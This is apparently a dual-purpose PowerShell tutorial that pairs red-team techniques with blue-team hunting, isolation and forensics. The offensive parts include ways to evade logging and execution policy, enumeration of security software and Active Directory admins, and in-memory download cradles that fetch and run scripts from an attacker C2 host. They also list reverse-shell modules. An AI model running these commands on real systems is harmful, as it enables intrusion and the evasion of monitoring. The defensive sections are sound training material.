The PowerShell Operator’s Guide

From "Living-off-the-Land" to Advanced Forensics

Core Philosophy: PowerShell is not just a scripting language; it is the direct interface to the Windows API and .NET Framework.

• The Operator's Mindset: Everything is an Object. Text parsing (grep/awk) is secondary to object manipulation (Select, Where).

• The Golden Rule: "Living off the Land" (LotL) means using native tools to avoid triggering EDR/AV solutions.

---

Part 1: The Environment & Fundamentals

Before executing, establish control and understand the engine.

1.1 Session Hygiene & OpSec

Professional operators do not rely on global settings; they configure the current session to be stealthy or verbose as needed.

Red Team (Stealth Configuration):

Avoid changing registry keys—bypass restrictions only for the running process.

# 1. Bypass Execution Policy (Scope: Process Only)
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force

# 2. Disable History Logging (Prevents artifacts in $env:APPDATA)
Set-PSReadlineOption -HistorySaveStyle SaveNothing

# 3. Suppress Error Noise (cleaner output during recon)
$ErrorActionPreference = "SilentlyContinue"

Blue Team (Visibility Configuration):

Enable logging to capture attacker activity.

# Enable Script Block Logging (Event ID 4104) - Captures de-obfuscated code
if (!(Test-Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging)) {
    New-Item -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Force
}
Set-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Name "EnableScriptBlockLogging" -Value 1

1.2 The Object Pipeline (The Engine)

Mastering Get-Member (gm) is the difference between a novice and a pro.

Cmdlet	Alias	Function
Get-Member	gm	Crucial. Reveals properties (data) and methods (actions) of an object.
Where-Object	?	Filters the pipeline based on object properties.
Select-Object	select	Extracts specific properties to display or export.
ForEach-Object	%	Iterates through items in the pipeline.

The Workflow:

1. Get the object.

2. Filter (?) the object.

3. Select (select) the data you need.

# Example: Find processes consuming > 500MB RAM
Get-Process | Where-Object { $_.WorkingSet -gt 500MB } | Select-Object Name, Id, WorkingSet

---

Part 2: Red Team Operations (Offence)

Focus: Enumeration, Evasion, and Lateral Movement.

2.1 Host Reconnaissance (LotL)

Gathering intelligence using native WMI/CIM classes (No external tools).

# System Triage
Get-ComputerInfo | Select-Object OsName, WindowsVersion, CsProcessors, BiosSerialNumber

# Security Software Enumeration (Find EDR/AV)
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | 
    Select-Object displayName, productState, pathToSignedProductExe

2.2 Network Discovery (The "Quiet" Scan)

Using .NET sockets to map the network without dropping Nmap.

# Sweep a Subnet (192.168.1.x) for SMB (445) and RDP (3389)
1..254 | ForEach-Object { 
    $IP = "192.168.1.$_"
    $PortCheck = Test-NetConnection -ComputerName $IP -Port 445 -WarningAction SilentlyContinue
    if ($PortCheck.TcpTestSucceeded) {
        [PSCustomObject]@{ IP = $IP; Status = "Alive"; Service = "SMB" }
    }
}

2.3 Active Directory (The "No-Module" Method)

Attackers often land on workstations without RSAT tools. Use the [ADSISearcher] accelerator.

# Find Domain Admins (LDAP Query)
$Searcher = [adsisearcher]""
$Searcher.Filter = "(&(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=corp,DC=local))"
$Searcher.FindAll() | Select-Object Path

# Find Domain Controllers
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select-Object Name, IPAddress

2.4 "Fileless" Execution (Download Cradles)

Loading scripts directly into RAM to bypass file scanning.

# The "Proxy-Aware" Download Cradle
# This downloads a script from a C2 server and runs it in memory (IEX)
$p = New-Object System.Net.WebProxy('http://proxy.corp.local:8080')
$p.Credentials = [System.Net.CredentialCache]::DefaultCredentials
$wc = New-Object System.Net.WebClient; $wc.Proxy = $p
IEX ($wc.DownloadString('http://attacker-c2/payload.ps1'))

---

Part 3: Blue Team Operations (Defence)

Focus: Hunting, Hardening, and Auditing.

3.1 Threat Hunting (Event Logs)

Get-WinEvent is superior to Get-EventLog. Use FilterHashtable for speed.

Hunting Brute Force (Credential Access):

# Look for Event ID 4625 (Failed Logon) - High volume indicates spraying
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625} -MaxEvents 500 | 
    Group-Object -Property {$_.Properties[19].Value} | # Group by Source IP
    Select-Object Count, Name | Sort-Object Count -Descending

Hunting Lateral Movement (Pass-the-Hash):

# Look for Event ID 4624 (Logon) Type 3 (Network) using NTLM
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | 
    Where-Object { $_.Properties[8].Value -eq 3 -and $_.Properties[10].Value -eq 'NTLM' } | 
    Select-Object TimeCreated, @{N='Account';E={$_.Properties[5].Value}}, @{N='Source';E={$_.Properties[18].Value}}

3.2 Integrity Checking

Verifying system state against known baselines.

# Check for Unsigned Drivers/DLLs in System32 (Indicator of Rootkits)
Get-ChildItem C:\Windows\System32\*.dll | 
    Get-AuthenticodeSignature | 
    Where-Object { $_.Status -ne "Valid" } | Select-Object Path, Status

---

Part 4: Incident Response (The Kill Chain)

Scenario: Alert received. Ransomware or C2 active. Immediate Triage.

Shutterstock

4.1 Isolation (Surgical Firewalling)

Cut the host off from the internet/LAN, but keep your management port open.

# Block Everything
New-NetFirewallRule -DisplayName "ISOLATION_BLOCK_ALL" -Direction Inbound -Action Block -Profile Any
# Allow ONLY the IR Team Jump Box
New-NetFirewallRule -DisplayName "ISOLATION_ALLOW_IR" -Direction Inbound -Action Allow -RemoteAddress "10.0.0.50"

4.2 Volatile Data Capture

Capture RAM artifacts before the system crashes or reboots.

# 1. Capture Network Connections (Find the C2 IP)
Get-NetTCPConnection | Select-Object CreationTime, LocalAddress, LocalPort, RemoteAddress, RemotePort, State, OwningProcess | 
    Export-Csv "C:\Evidence\net_connections.csv"

# 2. Capture Running Processes + Command Lines (Crucial for decoding malware)
Get-CimInstance Win32_Process | Select-Object ProcessId, Name, CommandLine, ParentProcessId | 
    Export-Csv "C:\Evidence\processes.csv"

4.3 Malware Analysis (Decoding Payloads)

Attackers use Base64 to hide. Decode it.

# Detect and Decode "EncodedCommand"
$Malicious = Get-CimInstance Win32_Process | Where-Object { $_.CommandLine -match "-enc" }
foreach ($proc in $Malicious) {
    if ($proc.CommandLine -match "([A-Za-z0-9+/=]{20,})") {
        $b64 = $matches[1]
        $bytes = [System.Convert]::FromBase64String($b64)
        $decoded = [System.Text.Encoding]::Unicode.GetString($bytes)
        Write-Host "PID $($proc.ProcessId) Payload: $decoded" -ForegroundColor Red
    }
}

---

Part 5: Modular Warfare (External Tools)

Do not reinvent the wheel. Use community-standard modules.

5.1 How to Load Modules (Safe vs. Unsafe)

• Safe (Blue Team): Install-Module from PSGallery.

• Stealth (Red Team): Load directly into memory via IEX (WebClient) to avoid disk artifacts.

5.2 The "Red" Modules (Offence)

Module	Purpose	Critical Commands
PowerView (PowerSploit)	AD Recon. The standard for mapping domains.	Get-NetDomain Get-NetUser Find-LocalAdminAccess (Finds where you are admin) Get-NetSession (Finds where Domain Admins are logged in)
PowerUp	PrivEsc. Audits local vulnerabilities.	Invoke-AllChecks (Runs full audit) Get-ServiceUnquoted (Finds unquoted paths)
Nishang	Exploitation. Shells and scanners.	Invoke-PowerShellTcp (Reverse Shell) Invoke-PortScan

Example: Memory Loading PowerView

IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.5/PowerView.ps1')
Get-NetDomain

5.3 The "Blue" Modules (Forensics)

Module	Purpose	Critical Commands
PowerForensics	Disk Forensics. Reads raw NTFS/MFT.	Get-ForensicFileRecord (Reads MFT) Invoke-ForensicDD (Bit-level copy of locked files like SAM)
NTFSSecurity	ACL Auditing. Readable permissions.	Get-NTFSOwner Get-NTFSAccess (Audit who can read/write files)
MicroBurst	Cloud. Azure AD auditing.	Get-AzDomainInfo Get-AzStorageKeys

Example: Recovering Deleted Files with PowerForensics

Import-Module PowerForensics
Get-ForensicFileRecord -VolumeName C: | Where-Object { $_.Deleted -eq $true -and $_.FileName -like "*password*" }

---

Part 6: Advanced Scripting & Automation

Professionalising your scripts.

6.1 Error Handling (Try/Catch)

Essential for scripts that run across hundreds of machines.

try {
    $Result = Get-WmiObject Win32_Bios -ComputerName "Server01" -ErrorAction Stop
}
catch {
    Write-Warning "Failed to connect to Server01: $_"
    "$(Get-Date) - Connection Failed" | Out-File "errors.log" -Append
}

6.2 Data Export (JSON/CSV)

Never screenshot the console. Export to usable formats.

# Export to CSV for Excel
Get-Service | Export-Csv -Path services.csv -NoTypeInformation

# Export to JSON for APIs/Python
Get-Process | Select-Object Name, Id, Path | ConvertTo-Json -Depth 2 | Out-File procs.json

---

Part 7: The "Must-Have" Cheat Sheet

Task	Command / Syntax
Download File	Invoke-WebRequest -Uri $url -OutFile $file
Search Content	Get-ChildItem -Recurse | Select-String "password"
Base64 Encode	[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($str))
Base64 Decode	[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64))
Port Scan	Test-NetConnection -ComputerName $ip -Port $port
System Info	Get-ComputerInfo
User Info	whoami /all or Get-ADUser
Process Kill	Stop-Process -Id $pid -Force
History View	Get-Content (Get-PSReadlineOption).HistorySavePath